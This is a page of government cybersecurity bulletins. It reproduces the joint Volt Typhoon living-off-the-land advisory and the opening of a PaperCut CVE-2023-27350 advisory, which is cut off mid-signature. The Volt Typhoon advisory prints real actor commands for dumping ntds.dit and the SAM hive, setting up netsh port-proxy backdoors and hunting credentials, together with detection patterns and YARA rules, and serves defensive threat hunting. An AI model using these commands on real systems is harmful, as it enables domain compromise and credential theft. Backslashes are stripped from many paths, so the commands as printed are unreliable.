Bulletins

RSS Bulletins from National Cyber Awareness System

May 23, 2023

People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection | CISA

Summary

The United States and international cybersecurity authorities are issuing this joint Cybersecurity Advisory (CSA) to highlight a recently discovered cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.

This advisory from the United States National Security Agency (NSA), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Federal Bureau of Investigation (FBI), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Communications Security Establishment’s Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK) (hereafter referred to as the “authoring agencies”) provides an overview of hunting guidance and associated best practices to detect this activity.

One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the land, which uses built-in network administration tools to perform their objectives. This TTP allows the actor to evade detection by blending in with normal Windows system and network activities, avoid endpoint detection and response (EDR) products that would alert on the introduction of third-party applications to the host, and limit the amount of activity that is captured in default logging configurations. Some of the built-in tools this actor uses are: wmic, ntdsutil, netsh, and PowerShell. The advisory provides examples of the actor’s commands along with detection signatures to aid network defenders in hunting for this activity. Many of the behavioral indicators included can also be legitimate system administration commands that appear in benign activity. Care should be taken not to assume that findings are malicious without further investigation or other indications of compromise.

Download the PDF version of this report (723 KB)

Technical Details

This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.

Background

The authoring agencies are aware of recent People’s Republic of China (PRC) state-sponsored cyber activity and have identified potential indicators associated with these techniques. This advisory will help net defenders hunt for this activity on their systems. It provides many network and host artifacts associated with the activity occurring after the network has been initially compromised, with a focus on command lines used by the cyber actor. An Indicators of compromise (IOCs) summary is included at the end of this advisory.

Especially for living off the land techniques, it is possible that some command lines might appear on a system as the result of benign activity and would be false positive indicators of malicious activity. Defenders must evaluate matches to determine their significance, applying their knowledge of the system and baseline behavior. Additionally, if creating detection logic based on these commands, network defenders should account for variability in command string arguments, as items such as ports used may be different across environments.

Artifacts

Network artifacts

The actor has leveraged compromised small office/home office (SOHO) network devices as intermediate infrastructure to obscure their activity by having much of the command and control (C2) traffic emanate from local ISPs in the geographic area of the victim. Owners of SOHO devices should ensure that network management interfaces are not exposed to the Internet to avoid them being re-purposed as redirectors by malicious actors. If they must be exposed to the Internet, device owners and operators should ensure they follow zero trust principles and maintain the highest level of authentication and access controls possible.

The actor has used Earthworm and a custom Fast Reverse Proxy (FRP) client with hardcoded C2 callbacks [T1090] to ports 8080, 8443, 8043, 8000, and 10443 with various filenames including, but not limited to:

cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe.

Host artifacts

Windows management instrumentation (WMI/WMIC)

The actor has executed the following command to gather information about local drives [T1082]:

cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename"

This command does not require administrative credentials to return results. The command uses a command prompt [T1059.003] to execute a Windows Management Instrumentation Command Line (WMIC) query, collecting information about the storage devices on the local host, including drive letter, file system (e.g., new technology file system [NTFS]), free space and drive size in bytes, and an optional volume name. Windows Management Instrumentation (WMI) is a built-in Windows tool that allows a user to access management information from hosts in an enterprise environment. The command line version of WMI is called WMIC.

By default, WMI Tracing is not enabled, so the WMI commands being executed and the associated user might not be available. Additional information on WMI events and tracing can be found in the References section of the advisory.

Ntds.dit Active Directory database

The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive from Windows domain controllers (DCs) out of the network to perform password cracking [T1003.003]. (The ntds.dit file is the main Active Directory (AD) database file and, by default, is stored at %SystemRoot%NTDSntds.dit. This file contains information about users, groups, group memberships, and password hashes for all users in the domain; the SYSTEM registry hive contains the boot key that is used to encrypt information in the ntds.dit file.) Although the ntds.dit file is locked while in use by AD, a copy can be made by creating a Volume Shadow Copy and extracting the ntds.dit file from the Shadow Copy. The SYSTEM registry hive may also be obtained from the Shadow Copy. The following example commands show the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.

cmd /c vssadmin create shadow /for=C: > C:WindowsTemp.tmp

cmd /c copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit C:WindowsTemp > C:WindowsTemp.tmp

The built-in Ntdsutil.exe tool performs all these actions using a single command. There are several ways to execute Ntdsutil.exe, including running from an elevated command prompt (cmd.exe), using WMI/WMIC, or PowerShell. Defenders should look for the execution of Ntdsutil.exe commands using long, short, or a combination of the notations. For example, the long notation command activate instance ntds ifm can also be executed using the short notation ac i ntds i. Table 1 provides the long and short forms of the arguments used in the sample Ntdsutil.exe command, along with a brief description of the arguments.

Table 1: Ntdsutil.exe command syntax

Long form

Short form

Description

activate instance %

ac i %

Sets variable % as the active instance for ntdsutil to use

ifm

i

Install from media (ifm). Creates installation media to be used with DCPromo so the server will not need to copy data from another Domain Controller on the network

The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe. Each of the following actor commands is a standalone example; multiple examples are provided to show how syntax and file paths may differ per environment.

wmic process call create "ntdsutil "ac i ntds" ifm "create full C:WindowsTemppro

wmic process call create "cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:WindowsTempPro"

wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp"

"cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:windowsTempMcAfee_Logs & ntdsutil "ac i ntds" ifm "create full C:WindowsTempMcAfee_Logs"

cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp"  1> \127.0.0.1ADMIN$ 2>&1

Note: The would be an epoch timestamp following the format like “__1684956600.123456”.

Each actor command above creates a copy of the ntds.dit database and the SYSTEM and SECURITY registry hives in the C:WindowsTemp directory, where is replaced with the path specified in the command (e.g., pro, tmp, or McAfee_Logs). By default, the hidden ADMIN$ share is mapped to C:Windows, so the last command will direct standard output and error messages from the command to a file within the folder specified.

The actor has also saved the files directly to the C:WindowsTemp and C:UsersPublic directories, so the entirety of those directory structures should be analyzed. Ntdsutil.exe creates two subfolders in the directory specified in the command: an Active Directory folder that contains the ntds.dit and ntds.jfm files, and a registry folder that contains the SYSTEM and SECURITY hives. Defenders should look for this folder structure across their network:

Active Directoryntds.dit
Active Directoryntds.jfm

registrySECURITY

registrySYSTEM

When one of the example commands is executed, several successive log entries are created in the Application log, under the ESENT Source. Associated events can be viewed in Windows Event Viewer by navigating to: Windows Logs | Application. To narrow results to relevant events, select Filter Current Log from the Actions menu on the right side of the screen. In the Event sources dropdown, check the box next to ESENT, then limit the logs to ID numbers 216, 325, 326, and 327. Clicking the OK box will apply the filters to the results.

Since ESENT logging is used extensively throughout Windows, defenders should focus on events that reference ntds.dit. If such events are present, the events’ details should contain the file path where the file copies were created. Since these files can be deleted, or enhanced logging may not be configured on hosts, the file path can greatly aid in a hunt operation. Identifying the user associated with this activity is also a critical step in a hunt operation as other actions by the compromised—or actor-created—user account can be helpful to understand additional actor TTPs, as well as the breadth of the actor's actions.

Note: If an actor can exfiltrate the ntds.dit and SYSTEM registry hive, the entire domain should be considered compromised, as the actor will generally be able to crack the password hashes for domain user accounts, create their own accounts, and/or join unauthorized systems to the domain. If this occurs, defenders should follow guidance for removing malicious actors from victim networks, such as CISA's Eviction Guidance for Network Affected by the SolarWinds and Active Directory/M365 Compromise.

In addition to the above TTPs used by the actor to copy the ntds.dit file, the following tools could be used by an actor to obtain the same information:

  • Secretsdump.py
    • Note: This script is a component of Impacket, which the actor has been known to use
  • Invoke-NinjaCopy (PowerShell)
  • DSInternals (PowerShell)
  • FgDump
  • Metasploit

Best practices for securing ntds.dit include hardening Domain Controllers and monitoring event logs for ntdsutil.exe and similar process creations. Additionally, any use of administrator privileges should be audited and validated to confirm the legitimacy of executed commands.

PortProxy

The actor has used the following commands to enable port forwarding [T1090] on the host:

"cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress= connectport=8443 protocol=tcp""

"cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=1433 connectaddress="

where is replaced with an IPv4 address internal to the network, omitting the ’s.

Netsh is a built-in Windows command line scripting utility that can display or modify the network settings of a host, including the Windows Firewall. The portproxy add command is used to create a host:port proxy that will forward incoming connections on the provided listenaddress and listenport to the connectaddress and connectport. Administrative privileges are required to execute the portproxy command. Each portproxy command above will create a registry key in the HKLMSYSTEMCurrentControlSetServicesPortProxyv4tov4tcp path. Defenders should look for the presences of keys in this path and investigate any anomalous entries.

Note: Using port proxies is not common for legitimate system administration since they can constitute a backdoor into the network that bypasses firewall policies. Administrators should limit port proxy usage within environments and only enable them for the period of time in which they are required.

Defenders should also use unusual IP addresses and ports in the command lines or registry entries to identify other hosts that are potentially included in actor actions. All hosts on the network should be examined for new and unusual firewall and port forwarding rules, as well as IP addresses and ports specified by the actor. If network traffic or logging is available, defenders should attempt to identify what traffic was forwarded though the port proxies to aid in the hunt operation. As previously mentioned, identifying the associated user account that made the networking changes can also aid in the hunt operation.

Firewall rule additions and changes can be viewed in Windows Event Viewer by navigating to:

Applications and Service Logs | Microsoft | Windows | Windows Firewall With Advanced Security | Firewall.

In addition to host-level changes, defenders should review perimeter firewall configurations for unauthorized changes and/or entries that may permit external connections to internal hosts. The actor is known to target perimeter devices in their operations. Firewall logs should be reviewed for any connections to systems on the ports listed in any portproxy commands discovered.

PowerShell

The actor has used the following PowerShell [T1059.001] command to identify successful logons to the host [T1033]:

Get-EventLog security -instanceid 4624

Note: Event ID 4624 is logged when a user successfully logs on to a host and contains useful information such as the logon type (e.g., interactive or networking), associated user and computer account names, and the logon time. Event ID 4624 entries can be viewed in Windows Event Viewer by navigating to:

Windows Logs | Security. PowerShell logs can be viewed in Event Viewer: Applications and Service Logs | Windows PowerShell.

This command identifies what user account they are currently leveraging to access the network, identify other users logged on to the host, or identify how their actions are being logged. If the actor is using a password spray technique [T1110.003], there may be several failed logon (Event ID 4625) events for several different user accounts, followed by one or more successful logons (Event ID 4624) within a short period of time. This period may vary by actor but can range from a few seconds to a few minutes.

If the actor is using brute force password attempts [T1110] against a single user account, there may be several Event ID 4625 entries for that account, followed by a successful logon Event ID 4624. Defenders should also look for abnormal account activity, such as logons outside of normal working hours and impossible time-and-distance logons (e.g., a user logging on from two geographically separated locations at the same time).

Impacket

The actor regularly employs the use of Impacket’s wmiexec, which redirects output to a file within the victim host's ADMIN$ share (C:Windows) containing an epoch timestamp in its name. The following is an example of the "dir" command being executed by wmiexec.py:

cmd.exe /Q /c *dir 1> \127.0.0.1ADMIN$__1684956600.123456 2>&1

Note: Discovery of an entry similar to the example above in the Windows Event Log and/or a file with a name in a similar format may be evidence of malicious activity and should be investigated further. In the event that only a filename is discovered, the epoch timestamp within the filename reflects the time of execution by default and can be used to help scope threat hunting activities.

Enumeration of the environment

The following commands were used by the actor to enumerate the network topology [T1016], the active directory structure [T1069.002], and other information about the target environment [T1069.001], [T1082]:

arp -a

curl www.ip-api.com

dnscmd . /enumrecords /zone {REDACTED}

dnscmd . /enumzones

dnscmd /enumrecords {REDACTED} . /additional

ipconfig /all

ldifde.exe -f c:windowstemp.txt -p subtree

net localgroup administrators

net group /dom

net group "Domain Admins" /dom

netsh interface firewall show all

netsh interface portproxy show all

netsh interface portproxy show v4tov4

netsh firewall show all

netsh portproxy show v4tov4

netstat -ano

reg query hklmsoftware

systeminfo

tasklist /v

whoami

wmic volume list brief

wmic service brief

wmic product list brief

wmic baseboard list full

wevtutil qe security /rd:true /f:text /q:*[System[(EventID=4624) and TimeCreated[@SystemTime>='{REDACTED}']] and EventData[Data='{REDACTED}']]

Additional credential theft

The actor also used the following commands to identify additional opportunities for obtaining credentials in the environment [T1555], [T1003]:

dir C:Users{REDACTED}.sshknown_hosts

dir C:users{REDACTED}appdataroamingMozillafirefoxprofiles

     mimikatz.exe

reg query hklmsoftwareOpenSSH

reg query hklmsoftwareOpenSSHAgent

reg query hklmsoftwarerealvnc

reg query hklmsoftwarerealvncvncserver

reg query hklmsoftwarerealvncAllusers

reg query hklmsoftwarerealvncAllusersvncserver

reg query hkcusoftware{REDACTED}puttysession

reg save hklmsam ss.dat

reg save hklmsystem sy.dat

Additional commands

The actor executed the following additional commands:

7z.exe a -p {REDACTED} c:windowstemp{REDACTED}.7z

C:Windowssystem32pcwrun.exe C:UsersAdministratorDesktopWin.exe

C:WindowsSystem32cmdbak.exe /c ping -n 1 127.0.0.1 >

C:Windowstempputty.log

C:WindowsTemptmp.log

"cmd.exe" /c dir \127.0.0.1C$ /od

"cmd.exe" /c ping –a –n 1 

"cmd.exe" /c wmic /user: /password: process call create "net stop "" > C:WindowsTemptmp.log"

cmd.exe /Q /c cd 1> \127.0.0.1ADMIN$__ 2 2>&1

net use \127.0.0.1IPC$ /y /d

powershell start-process -filepath c:windowstemp.bat -windowstyle Hidden

rar.exe a –{REDACTED} c:Windowstemp{REDACTED} D:{REDACTED}

wmic /node:{REDACTED} /user:{REDACTED} /password:{REDACTED} cmd /c whoami

xcopy C:windowstemphp d:{REDACTED}

Mitigations

The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity Frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Defenders should harden domain controllers and monitor event logs [2.T] for ntdsutil.exe and similar process creations. Additionally, any use of administrator privileges should be audited and validated to confirm the legitimacy of executed commands.
  • Administrators should limit port proxy usage within environments and only enable them for the period of time in which they are required [2.X].
  • Defenders should investigate unusual IP addresses and ports in command lines, registry entries, and firewall logs to identify other hosts that are potentially involved in actor actions.
  • In addition to host-level changes, defenders should review perimeter firewall configurations for unauthorized changes and/or entries that may permit external connections to internal hosts.
  • Defenders should also look for abnormal account activity, such as logons outside of normal working hours and impossible time-and-distance logons (e.g., a user logging on from two geographically separated locations at the same time).
  • Defenders should forward log files to a hardened centralized logging server, preferably on a segmented network [2.F].

Logging recommendations

To be able to detect the activity described in this CSA, defenders should set the audit policy for Windows security logs to include “audit process creation” and “include command line in process creation events” in addition to accessing the logs. Otherwise, the default logging configurations may not contain the necessary information.

Enabling these options will create Event ID 4688 entries in the Windows Security log to view command line processes. Given the cost and difficulty of logging and analyzing this kind of activity, if an organization must limit the requirements, they should focus on enabling this kind of logging on systems that are externally facing or perform authentication or authorization, especially including domain controllers.

To hunt for the malicious WMI and PowerShell activity, defenders should also log WMI and PowerShell events. By default, WMI Tracing and deep PowerShell logging are not enabled, but they can be enabled by following the configuration instructions linked in the References section.

The actor takes measures to hide their tracks, such as clearing logs [T1070.001]. To ensure log integrity and availability, defenders should forward log files to a hardened centralized logging server, preferably on a segmented network. Such an architecture makes it harder for an actor to cover their tracks as evidence of their actions will be captured in multiple locations.

Defenders should also monitor logs for Event ID 1102, which is generated when the audit log is cleared. All Event ID 1102 entries should be investigated as logs are generally not cleared and this is a known actor tactic to cover their tracks. Even if an event log is cleared on a host, if the logs are also stored on a logging server, the copy of the log will be preserved.

This activity is often linked to malicious exploitation of edge devices and network management devices. Defenders should enable logging on their edge devices, to include system logs, to be able to identify potential exploitation and lateral movement. They should also enable network-level logging, such as sysmon, webserver, middleware, and network device logs.

Indicators of compromise (IOCs) summary

TTPs

Command execution

File names and directory paths used in these commands are only meant to serve as examples. Actual names and paths may differ depending on environment and activity, so defenders should account for variants when performing queries.

Note: Many of the commands are derivatives of common system administration commands that could generate false positives when used alone without additional indicators.

7z.exe a -p {REDACTED} c:windowstemp{REDACTED}.7z c:windowstemp*

"C:pstoolspsexec.exe" \{REDACTED} -s cmd /c "cmd.exe /c "netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999""

C:Windowssystem32pcwrun.exe C:UsersAdministratorDesktopWin.exe

cmd.exe /C dir /S \{REDACTED}c$Users{REDACTED} >> c:windowstemp{REDACTED}.tmp



"cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:windowsTempMcAfee_Logs & ntdsutil "ac i ntds" ifm "create full C:WindowsTempMcAfee_Logs"

cmd.exe /Q /c *cd 1> \127.0.0.1ADMIN$__ 2>&1

cmd.exe /Q /c cd 1> \127.0.0.1ADMIN$__1652470932.9400265 2>&1

cmd.exe /Q /c net group "domain admins" /dom 1>\127.0.0.1ADMIN$__ 2>&1

cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp"  1> \127.0.0.1ADMIN$  2>&1

D:{REDACTED}xcopy C:windowstemphp d:{REDACTED}

Get-EventLog security -instanceid 4624

ldifde.exe -f c:windowstempcisco_up.txt -p subtree

makecab ..backup210829-020000.zip ..webappsadssphtmlLock.lic

move "\c$userspublicAppfileregistrySYSTEM" ..backup210829-020000.zip

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress={REDACTED} connectport=8443 protocol=tcp

netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999



Rar.exe a –{REDACTED} c:WindowstempDMBC2C61.tmp

start-process -filepath c:windowstemp.bat -windowstyle hidden 1

Note: The batch file in question (.bat) could use any name, and no discernable pattern has been determined at this time.

wmic process call create "cmd.exe /c mkdir C:userspublicAppfile & ntdsutil "ac i ntds" ifm "create full C:userspublicAppfile" q q

wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp"

wmic process call create "cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:WindowsTempPro"

wmic process call create "ntdsutil "ac i ntds" ifm "create full C:WindowsTemp"

Command line patterns

Certain patterns in commands (with asterisks for wildcards) can be used to identify potentially malicious commands:

  • cmd.exe /C dir /S \* >> *
  • cmd.exe /Q /c * 1> \127.0.0.1ADMIN$__*.*>&1
  • powershell start-process -filepath c:windowstemp*.exe -windowstyle hidden

File paths

The most common paths where files and executables used by the actor have been found include:

  • C:UsersPublicAppfile (including subdirectories)
  • C:Perflogs (including subdirectories)
  • C:WindowsTemp (including subdirectories)

File names

The file names the actor has previously used for such things as malware, scripts, and tools include:

backup.bat

cl64.exe

update.bat

Win.exe

billagent.exe

nc.exe

update.exe

WmiPrvSE.exe

billaudit.exe

rar.exe

vm3dservice.exe

WmiPreSV.exe

cisco_up.exe

SMSvcService.exe

watchdogd.exe

 

In addition to the file names and paths above, malicious files names, believed to be randomly created, in the following format have also been discovered:

C:Windows[a-zA-Z]{8}.exe

SHA-256 file hashes

  • f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
  • ef09b8ff86c276e9b475a6ae6b54f08ed77e09e169f7fc0872eb1d427ee27d31
  • d6ebde42457fe4b2a927ce53fc36f465f0000da931cfab9b79a36083e914ceca
  • 472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d
  • 66a19f7d2547a8a85cee7a62d0b6114fd31afdee090bd43f36b89470238393d7
  • 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71
  • 41e5181b9553bbe33d91ee204fe1d2ca321ac123f9147bb475c0ed32f9488597
  • c7fee7a3ffaf0732f42d89c4399cbff219459ae04a81fc6eff7050d53bd69b99
  • 3a9d8bb85fbcfe92bae79d5ab18e4bca9eaf36cea70086e8d1ab85336c83945f
  • fe95a382b4f879830e2666473d662a24b34fccf34b6b3505ee1b62b32adafa15
  • ee8df354503a56c62719656fae71b3502acf9f87951c55ffd955feec90a11484

User-agent

In some cases, the following user-agent string (including the extra spacing) was identified performing reconnaissance activities by this actor:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:68.0)               Gecko/20100101 Firefox/68.0

Yara rules

rule ShellJSP {

    strings:

        $s1 = "decrypt(fpath)"

        $s2 = "decrypt(fcontext)"

        $s3 = "decrypt(commandEnc)"

        $s4 = "upload failed!"

        $s5 = "aes.encrypt(allStr)"

        $s6 = "newid"


    condition:

        filesize }
rule EncryptJSP {

    strings:

        $s1 = "AEScrypt"

        $s2 = "AES/CBC/PKCS5Padding"

        $s3 = "SecretKeySpec"

        $s4 = "FileOutputStream"

        $s5 = "getParameter"

        $s6 = "new ProcessBuilder"

        $s7 = "new BufferedReader"

        $s8 = "readLine()"


    condition:

        filesize 
rule CustomFRPClient {

   meta:

        description=”Identify instances of the actor's custom FRP tool based on unique strings chosen by the actor and included in the tool”

   strings:

        $s1 = "%!PS-Adobe-" nocase ascii wide

        $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide

        $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide

        $s4 = "MAGA2024!!!" nocase ascii wide

        $s5 = "HTTP_PROXYHost: %s" nocase ascii wide

  

   condition:

        all of them

}
rule HACKTOOL_FRPClient {

   meta:

        description=”Identify instances of FRP tool (Note: This tool is known to be used by multiple actors, so hits would not necessarily imply activity by the specific actor described in this report)”

   strings:

        $s1 = "%!PS-Adobe-" nocase ascii wide

        $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide

        $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide

        $s4 = "HTTP_PROXYHost: %s" nocase ascii wide

  

   condition:

        3 of them

}

References

Active Directory and domain controller hardening:

CISA regional cyber threats:

Microsoft Threat Intelligence blog:

Ntdsutil.exe:

PowerShell:

Windows command line process auditing:

Windows Defender Firewall:

Windows management instrumentation:

Windows password spraying:

Acknowledgements

The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Broadcom, Cisco Talos, Google's Threat Analysis Group, Lumen Technologies, Mandiant, Microsoft Threat Intelligence (MSTI), Palo Alto Networks, SecureWorks, SentinelOne, Trellix, and additional industry partners for their collaboration on this advisory.

Disclaimer of endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies' governments, and this guidance shall not be used for advertising or product endorsement purposes.

Trademark recognition

Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.

Purpose

This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact

U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/field-offices.  

NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov

NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov

NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov

Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.

Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.

New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.

United Kingdom organizations: Report a significant cyber security incident at ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Appendix: MITRE ATT&CK Techniques

Table 2 captures all referenced threat actor tactics and techniques in this advisory.

Table 2: All referenced threat actor tactics and techniques

Initial Access

Technique Title

ID

Use

Exploit Public-facing Application

T1190

Actor used public-facing applications to gain initial access to systems; in this case, Earthworm and PortProxy.

Execution

Windows Management Instrumentation

T1047

The actor executed WMIC commands to create a copy of the SYSTEM registry.

Command and Scripting Interpreter: PowerShell

T1059.001

The actor used a PowerShell command to identify successful logons to the host.

Command and Scripting Interpreter: Windows Command Shell

T1059.003

The actor used this primary command prompt to execute a query that collected information about the storage devices on the local host.

Persistence

Server Software Component: Web Shell

T1505.003

The actor used backdoor web servers with web shells to establish persistence to systems, including some of the webshells being derived from Awen webshell.

Defense Evasion

Hide Artifacts

T1546

The actor selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity.

Indicator Removal: Clear Windows Event Logs

T1070.001

The actor cleared system event logs to hide activity of an intrusion.

Credential Access

OS Credential Dumping: NTDS

T1003.003

The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive out of the network to perform password cracking.

Brute Force

T1110

The actor attempted to gain access to accounts with multiple password attempts.

Brute Force: Password Spraying

T1110.003

 

The actor used commonly used passwords against accounts to attempt to acquire valid credentials.

OS Credential Dumping

T1003

The actor used additional commands to obtain credentials in the environment.

Credentials from Password Stores

T1555

The actors searched for common password storage locations.

Discovery

System Information Discovery

T1082

The actors executed commands to gather information about local drives.

System Owner/User Discovery

T1033

The actors gathered information about successful logons to the host using a PowerShell command.

Permission Groups Discovery: Local Groups

T1069.001

The actors attempt to find local system groups and permission settings.

Permission Groups Discovery: Doman Groups

T1069.002

The actors used commands to enumerate the active directory structure.

System Network Configuration Discovery

T1016

The actors used commands to enumerate the network topology.

Command and Control

Proxy

T1090

The actors used commands to enable port forwarding on the host.

Proxy: External Proxy

T1090.002

The actors used compromised SOHO devices (e.g. routers) to obfuscate the source of their activity.

 

May 10, 2023

Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG | CISA

SUMMARY

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials. PaperCut released a patch in March 2023.

According to FBI observed information, malicious actors exploited CVE-2023-27350 beginning in mid-April 2023 and continuing through the present. In early May 2023, also according to FBI information, a group self-identifying as the Bl00dy Ransomware Gang attempted to exploit vulnerable PaperCut servers against the Education Facilities Subsector.

This joint advisory provides detection methods for exploitation of CVE-2023-27350 as well and indicators of compromise (IOCs) associated with Bl00dy Ransomware Gang activity. FBI and CISA strongly encourage users and administrators to immediately apply patches, and workarounds if unable to patch. FBI and CISA especially encourage organizations who did not patch immediately to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.

Download the PDF version of this report:

TECHNICAL DETAILS

Vulnerability Overview

CVE-2023-27350 allows a remote actor to bypass authentication and conduct remote code execution on the following affected installations of PaperCut:[1]

  • Version 8.0.0 to 19.2.7
  • Version 20.0.0 to 20.1.6
  • Version 21.0.0 to 21.2.10
  • Version 22.0.0 to 22.0.8

PaperCut servers vulnerable to CVE-2023-27350 implement improper access controls in the SetupCompleted Java class, allowing malicious actors to bypass user authentication and access the server as an administrator. After accessing the server, actors can leverage existing PaperCut software features for remote code execution (RCE). There are currently two publicly known proofs of concept for achieving RCE in vulnerable PaperCut software:

  • Using the print scripting interface to execute shell commands.
  • Using the User/Group Sync interface to execute a living-off-the-land-style attack.

FBI and CISA note that actors may develop other methods for RCE.

The PaperCut server process pc-app.exe runs with SYSTEM- or root-level privileges. When the software is exploited to execute other processes such as cmd.exe or powershell.exe, these child processes are created with the same privileges. Commands supplied with the execution of these processes will also run with the same privileges. As a result, a wide range of post-exploitation activity is possible following initial access and compromise.

This CVE was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog on April 21, 2023.

Threat Actor Activity

Education Facilities Subsector entities maintained approximately 68% of exposed, but not necessarily vulnerable, U.S.-based PaperCut servers. In early May 2023, according to FBI information, the Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet. Ultimately, some of these operations led to data exfiltration and encryption of victim systems. The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files (see Figure 1).

Figure 1: Example Bl00dy Gang Ransomware Note
Figure 1: Example Bl00dy Gang Ransomware Note

According to FBI information, legitimate remote management and maintenance (RMM) software was downloaded and executed on victim systems via commands issued through PaperCut’s print scripting interface. External network communications through Tor and/or other proxies from inside victim networks helped Bl00dy Gang ransomware actors mask their malicious network traffic. The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.

DETECTION METHODS

Network defenders should focus detection efforts on three key areas:

  • Network traffic signatures – Look for network traffic attempting to access the SetupCompleted page of an exposed and vulnerable PaperCut server.
  • System monitoring – Look for child processes spawned from a PaperCut server’s pc-app.exe process.
  • Server settings and log files – Look for evidence of malicious activity in PaperCut server settings and log files.

Network Traffic Signatures

To exploit CVE-2023-27350, a malicious actor must first visit the SetupCompleted page of the intended target, which will provide the adversary with authentication to the targeted PaperCut server. Deploy the following Emerging Threat Suricata signatures to detect when GET requests are sent to the SetupCompleted page. (Be careful of improperly formatted double-quotation marks if copying and pasting signatures from this advisory.)

Note that some of the techniques identified in this section can affect the availability or stability of a system. Defenders should follow organizational policies and incident response best practices to minimize the risk to operations while threat hunting. 

alert http any any -> $HOME_NET any (
